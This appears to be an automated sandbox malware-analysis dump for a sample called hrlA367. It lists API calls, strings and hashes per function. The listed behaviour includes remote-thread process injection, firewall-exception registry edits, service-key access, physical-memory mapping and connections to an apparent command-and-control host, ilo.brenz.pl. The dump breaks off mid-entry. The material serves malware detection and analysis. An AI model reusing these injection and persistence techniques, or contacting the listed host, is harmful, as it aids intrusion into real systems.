Part of subcall function 00623D36: LoadLibraryA.KERNEL32(00623D2B), ref: 00623D36
Part of subcall function 00623D36: GetProcAddress.KERNEL32(00000000,00623D41), ref: 00623D4C
Part of subcall function 00623D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00623D5F
Part of subcall function 00623D36: GetTickCount.KERNEL32 ref: 00623D93
Part of subcall function 00623D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00626EF6,00000000,00000000,00000000,00000000), ref: 00623E65

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623D1F, 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
ADVAPI32.DLL, xrefs: 00623D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2038497427-2126123959
Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction ID: e8454bb418bd3bdec4a6cc5325a6ee504a2468e02d95ec0b778fd102973512ec
Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction Fuzzy Hash: 99E10171408668BFEB25AF24AC1ABEA7BAEEF01300F00455DEC499E182D7F45F458B65

Function 00623D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00623D2B), ref: 00623D36

Part of subcall function 00623D4B: GetProcAddress.KERNEL32(00000000,00623D41), ref: 00623D4C
Part of subcall function 00623D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00623D5F
Part of subcall function 00623D4B: GetTickCount.KERNEL32 ref: 00623D93
Part of subcall function 00623D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00626EF6,00000000,00000000,00000000,00000000), ref: 00623E65

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
ADVAPI32.DLL, xrefs: 00623D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3734769084-2126123959
Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction ID: feafba773b1dc8f60771043ce649bfabc7d85728c15cf534095bfd7e5b85db19
Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction Fuzzy Hash: C7D1F371408668BFEB259F24DC1ABEA7BAEEF41300F00055DEC499E282D7F45F458B65

Function 00623D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00623D41), ref: 00623D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00623D5F
GetTickCount.KERNEL32 ref: 00623D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00626EF6,00000000,00000000,00000000,00000000), ref: 00623E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 00623EE2
wsprintfA.USER32 ref: 00623EF7
CreateThread.KERNEL32(00000000,00000000,00623691,00000000,00000000), ref: 00623F40
CloseHandle.KERNEL32(?,1C567C50), ref: 00623F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00623FE9
CloseHandle.KERNEL32(?,00000000), ref: 00623FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00623FFF
socket.WS2_32(00000002,00000001,00000000), ref: 00624097
connect.WS2_32(6F6C6902,00623B09,00000010), ref: 006240B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006240FB
wsprintfA.USER32 ref: 00624179
SetEvent.KERNEL32(0000065C,?,00000000), ref: 006242D6
Sleep.KERNEL32(00007530,?,00000000), ref: 006242F7
ResetEvent.KERNEL32(0000065C,?,00000000), ref: 0062430A

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
ADVAPI32.DLL, xrefs: 00623D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1567941233-2126123959
Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction ID: 36a1f7aeb34ce33386af3ace0f3500c6af14510dc7c4c35f01c35bb194b0b2dc
Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction Fuzzy Hash: BCE1F171408668BFEB259F24AC0ABEA7BADEF41300F004559EC499E282D7F45F45CB65

Function 7FE30442 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 281memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 7FE304CD
GetVersion.KERNEL32 ref: 7FE3050F
VirtualAlloc.KERNEL32(00000000,000065A4,08001000,00000040), ref: 7FE30537
CloseHandle.KERNEL32(?), ref: 7FE305BC

Strings

\BaseNamedObjects\imktVt, xrefs: 7FE30718, 7FE30735, 7FE30743
csrs, xrefs: 7FE30835
"'3, xrefs: 7FE30603
\BaseNamedObjects\imktVt, xrefs: 7FE30717

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: "'3$\BaseNamedObjects\imktVt$\BaseNamedObjects\imktVt$csrs
API String ID: 3017432202-3310801285
Opcode ID: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction ID: bf6e148d40060bb9ff3a14a9286da860fd85a46fac5c7d6c15dd231958de371b
Opcode Fuzzy Hash: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction Fuzzy Hash: 95B16C31A05359FFEB619F20C809BED3BADEF4571AF900024EA0A9E181C7F1AB45CB55

Function 7FE30601 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 184stringnativeprocessCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 7FE305BC
GetModuleHandleA.KERNEL32(7FE305FB), ref: 7FE30601
lstrcpyW.KERNEL32(\BaseNamedObjects\imktVt,\BaseNamedObjects\imktVt,?,?,?,?), ref: 7FE30719
lstrcpyW.KERNEL32(\BaseNamedObjects\imktVt,?), ref: 7FE30736
lstrcatW.KERNEL32(\BaseNamedObjects\imktVt,\imktVt), ref: 7FE30744
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000065A4,00000000,?,00000002,00000000,00000040), ref: 7FE30774
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FE3078F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307D2
Process32First.KERNEL32 ref: 7FE307E5
Process32Next.KERNEL32 ref: 7FE307F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE3080E
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 7FE3084B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE30866
CloseHandle.KERNEL32 ref: 7FE30875

Strings

\BaseNamedObjects\imktVt, xrefs: 7FE30718, 7FE30735, 7FE30743
csrs, xrefs: 7FE30835
\BaseNamedObjects\imktVt, xrefs: 7FE30717

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\imktVt$\BaseNamedObjects\imktVt$csrs
API String ID: 1545766225-3978125692
Opcode ID: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction ID: 4034ee1ac34cf344d60b1b743f91cb73119df433e2ee071f6ee9a8f8d678e866
Opcode Fuzzy Hash: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction Fuzzy Hash: 0961BD31A05209FFDB619F10C84DBEE3B6EEF45719F904068EA0A9E590C7B1AF05CB95

Function 00624178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00624057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00624066
socket.WS2_32(00000002,00000001,00000000), ref: 00624097
connect.WS2_32(6F6C6902,00623B09,00000010), ref: 006240B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006240FB
wsprintfA.USER32 ref: 00624179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 006241B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00626AA2,00000000,00000000), ref: 006241BD
GetTickCount.KERNEL32 ref: 006241F6
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00626AA2,00000000,00000000), ref: 0062428B
GetTickCount.KERNEL32 ref: 00624294
closesocket.WS2_32(6F6C6902), ref: 006242B8
SetEvent.KERNEL32(0000065C,?,00000000), ref: 006242D6
Sleep.KERNEL32(00007530,?,00000000), ref: 006242F7
ResetEvent.KERNEL32(0000065C,?,00000000), ref: 0062430A

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00624178, 00624195, 006241DB

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN
API String ID: 883794535-2044341515
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: 14abf7b43081687a8610e7fc544324c7f9e4e2bc87c005dd4b205ad0919b7ac0
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: 5071EE71508669BAEB319F34981D7EEBFAEEF41310F040508E85A9E281CBF45F81CB65

Function 7FE329CC Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

\Device\PhysicalMemory, xrefs: 7FE329CC
C:,, xrefs: 7FE32A00

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:,$\Device\PhysicalMemory
API String ID: 2985292042-1440550476
Opcode ID: d4bbd99800a5ed16e67fd9b1e1255b72b407661223bcf3a707d0e03b541c6dfc
Instruction ID: f784499129cf61d4ff85df333bf3b76779e152c7d281c3d08bc0d42cf97a2f12
Opcode Fuzzy Hash: d4bbd99800a5ed16e67fd9b1e1255b72b407661223bcf3a707d0e03b541c6dfc
Instruction Fuzzy Hash: 1C817A71A00219FFDB208F24CC89FAA77BDEF44705F614258ED499B295D3B0AF45CA91

Function 006233E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0062344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00623469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00623493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 006234A0
UnmapViewOfFile.KERNEL32(?), ref: 006234B8

Strings

\Device\PhysicalMemory, xrefs: 006233E0
C:,, xrefs: 00623414

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:,$\Device\PhysicalMemory
API String ID: 2985292042-1440550476
Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction ID: 7418f092b1e62fe4d4d8e9f3a6c3b4afbefc4c590a82baf4574825cb8f1529aa
Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction Fuzzy Hash: 43819A71500628FFEB209F14DC89EAA3BAEEF45704F500658ED199B291D3F4AF458A64

Function 7FE329F1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

C:,, xrefs: 7FE32A00
ysic, xrefs: 7FE32A3C, 7FE32A52

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:,$ysic
API String ID: 2985292042-2852681185
Opcode ID: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction ID: 318294e3e7f85719ab3bc7b1e15188bdad7b77c11d20dad426282bd8f2c8130f
Opcode Fuzzy Hash: e096a308c09e6b02b95fe1d014301fff9b14a95bfc109e57e88e1af0ff91d58a
Instruction Fuzzy Hash: 77116D70640705FBEB218F10CC49FAA3B7DEF88704F544218EE1A9A290D7B4AF14C655

Function 00623405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0062344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00623469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00623493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 006234A0
UnmapViewOfFile.KERNEL32(?), ref: 006234B8

Strings

C:,, xrefs: 00623414
ysic, xrefs: 00623450, 00623466

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:,$ysic
API String ID: 2985292042-2852681185
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: ceab1a854a36252622730ee1a45ea5bc64af8449a512478180185dcd8d4cf5c9
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: 4A116070140618BBEB24DF14DC55FDA367DEF88744F50461CEA199B390D7F86F188A58

Function 7FE32425 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\imktVt), ref: 7FE32431
lstrlenW.KERNEL32(?), ref: 7FE32438
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FE3248D

Strings

\BaseNamedObjects\imktVt, xrefs: 7FE3242F

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\imktVt
API String ID: 2597515329-288789118
Opcode ID: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction ID: 36e2f0a27fad33023740782982cd1b2969f7fc0a37d941ebf6b0748064d4bf92
Opcode Fuzzy Hash: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction Fuzzy Hash: 9F0181B0790344BAF7305B29CC8BF5A3929DF81B51F948154F604AE1C4D5B99A0487AA

Function 006224AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\krktVt), ref: 006224BA
lstrlenW.KERNEL32(?), ref: 006224C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00622516

Strings

\BaseNamedObjects\krktVt, xrefs: 006224B8

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\krktVt
API String ID: 2597515329-3192795942
Opcode ID: cf07b347a0e0c1752a31311e41616237b242cbc7e37ea3d0786b3fde4713166c
Instruction ID: 6d4e25ebd380c40ec09386432a58d0543d8ac5973b6ffef799dd038e088c6b64
Opcode Fuzzy Hash: cf07b347a0e0c1752a31311e41616237b242cbc7e37ea3d0786b3fde4713166c
Instruction Fuzzy Hash: DD0181B0781304BAF7309B29CC4BF5F7929DF81B50F908558F608AE1C4DAB89A0483A9

Function 00402520 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 196stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402533
lstrcatA.KERNEL32(?,100200), ref: 00402543
RtlZeroMemory.KERNEL32 ref: 00402587

Strings

100200, xrefs: 0040253D, 004026DE, 004026EB
F7@, xrefs: 0040255F
"7@, xrefs: 004025B4, 004025CB
47@, xrefs: 004025A5
ImagePath, xrefs: 0040259F
SYSTEM\CurrentControlSet\Services\, xrefs: 0040252D

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: MemoryZerolstrcatlstrcpy
String ID: "7@$100200$47@$F7@$ImagePath$SYSTEM\CurrentControlSet\Services\
API String ID: 1768957353-3519508139
Opcode ID: 8a600dd736f3a178a13575e9a99342727ac9e09ed908883fd0121ec29af1dff4
Instruction ID: a495424809a9f9f54fedb59a1f20414eed3fe88150acac704cb64e1485c9eeb3
Opcode Fuzzy Hash: 8a600dd736f3a178a13575e9a99342727ac9e09ed908883fd0121ec29af1dff4
Instruction Fuzzy Hash: 8C51B435780305AFE320DB34ED49FEB37A8EB84721F504839FA46E11D0E6BD9519866D

Function 00623F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00623F83), ref: 00623F8F
WSAStartup.WS2_32(00000101), ref: 00623FCE
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00623FE9
CloseHandle.KERNEL32(?,00000000), ref: 00623FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00623FFF
lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00624057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00624066
socket.WS2_32(00000002,00000001,00000000), ref: 00624097
connect.WS2_32(6F6C6902,00623B09,00000010), ref: 006240B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006240FB
wsprintfA.USER32 ref: 00624179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 006241B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00626AA2,00000000,00000000), ref: 006241BD
GetTickCount.KERNEL32 ref: 006241F6
RtlExitUserThread.NTDLL(00000000), ref: 00624322

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
ilo.brenz.pl, xrefs: 00624056, 00624065
020a00 . . :#a260b0403 +*, xrefs: 00624195, 006241DB

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$ilo.brenz.pl
API String ID: 3316401344-3049915909
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: 6de5a9507a9dafb89a264d096665bf43d600a00cf0e9e960769836268c5fcd92
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: E891CB31508669FAEB319F24981DBEE7BAEEF41300F040548E95A9E281CBF45F85CB65

Function 7FE3307C Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 292filelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(7FE33071), ref: 7FE3307C
